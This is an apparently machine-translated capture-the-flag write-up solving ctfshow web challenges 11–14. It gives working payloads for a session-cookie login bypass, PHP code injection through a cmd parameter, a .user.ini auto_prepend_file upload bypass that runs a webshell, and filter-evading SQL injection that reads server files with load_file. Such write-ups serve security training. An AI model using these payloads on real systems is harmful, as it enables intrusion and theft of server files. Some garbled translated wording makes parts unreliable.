ctfshow Problem. web modular web11~web14

——

web11

Open the environment , You can enter the password to log in .
And gives the source code , Filter these characters ：

$regex = “/(select|from|where|join|sleep|and|\s|union|,)/i”;

When this condition is met , Output flag ：

if($password==$_SESSION['password']){
            echo $flag;

F12 Put PHPsession Get rid of the value of , Become empty .

Then log in without entering a password , Reach the value of password and session The values are equal , obtain flag .

——
——

web12

Open the environment , There is nothing on the interface , F12 Look at the source code for tips get The ginseng ?cmd=

test cmd Parameter effect ：

?cmd=phpinfo();

See echo , The explanation can be in cmd Construct statements on the value of to execute commands .

Originally wanted to use system() Command of function ：system(‘ls’) To read the existing file name , But this statement page has no echo .

Use here scandir() Function to view the files in the directory .
Construction statement ：

?cmd=print_r(scandir(‘./’));

Get a long file name .

Another function can also read directory files ： glob() function .
Such as ：

glob("*")   Match any file ;
glob("*.txt")   Match with  txt  A file with a suffix .

So you can also use sentences ：

?cmd=print_r(glob(“*”));

Show back the long file name in front .

Get the file name , Next, let's look at the contents of this document , Wanted to “url/ file name ” Direct view , however php The document doesn't seem to read , If it is .txt The document should be directly viewable .
So we need show_source() function ： On the file PHP Syntax highlight .
sentence ：

?cmd=show_source(“903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php”);

or

?cmd=highlight_file(“903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php”);

show_source The function is highlight_file() Alias for function
obtain flag .

——
——

web13

Open the environment , It is the question type of file upload .

First, simply try to pass .php In a word, Trojans , The echo ： error file zise , The back end has restrictions on file suffixes . Passed a lot , It's no use .

Here is a source file ,upload.php.bak , Visit to download .

Source code requirements , The size of the file should be less than or equal to 24, The length of the name is less than or equal to 9, The suffix length is less than or equal to 3, And the file name and suffix of the uploaded file cannot contain php The word .

The method of this problem should be to analyze the file .

First write a sentence into 1.txt In the text ,

Upload again **.user.ini** file
.user.ini It is PHP Support per directory INI File configuration , And if your PHP Run in a modular way Apache in , Then use .htaccess Files have the same effect .

The content is

auto_prepend_file=1.txt

auto_prepend_file Is to set the header and footer , You can ensure that they are loaded before and after each page .
Use these instructions to include files like include() Statement contains the same file .
With this conditional command . We can execute 1.txt Content. .
Then upload these two files .

After uploading , First use ?a=phpinfo(); test , See that you can successfully access .

Now you can use parameters a It's working .
Look at all the files in the directory ：

?a=system(‘ls’);

or

a=print_r(glob(“*”));

After seeing all the files , You can view the contents of the specified file .

a=highlight_file(‘903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php’);

obtain flag .

——
——

web14

Open the environment , The page displays a string of codes .

The content of the source code is get The ginseng c , also c The value of sleep() Within the function , That is, what is the value , The page will sleep for how many seconds .
And different value pages will echo different contents , There are some characters ’@[email protected]‘ , There are some characters '$url ’ , Correctly, it should echo variables $url .
Pass in ?c=3 when , Get a file name .

Access this file , Is a query page , Click to query the content in url Parameters of query It shows that .
Therefore, it is concluded that the parameter query After the sql Inject .

F12 You can see that many characters are filtered in the query statement , Yes information_schema ,.tables, .columns, linestring , Space ,polygon/is .
Try first

Execute statement , Space with /**/ Instead of , The echoed content will pop up JavaScript Mode appears .
Here we use burp Convenient view .
Try to check the data block version first ：

?query=-1/**/union/**/select/**/version()

Statement executed successfully , Get the version number 10.2.26-MariaDB-log

use load_file() Function to access the file you saw at the beginning of a string of code just before opening the environment secret.php ：

?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

secret.php The content shows that ,flag In another file /real_flag_is_here in .

The same access /real_flag_is_here file ：

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')

obtain flag .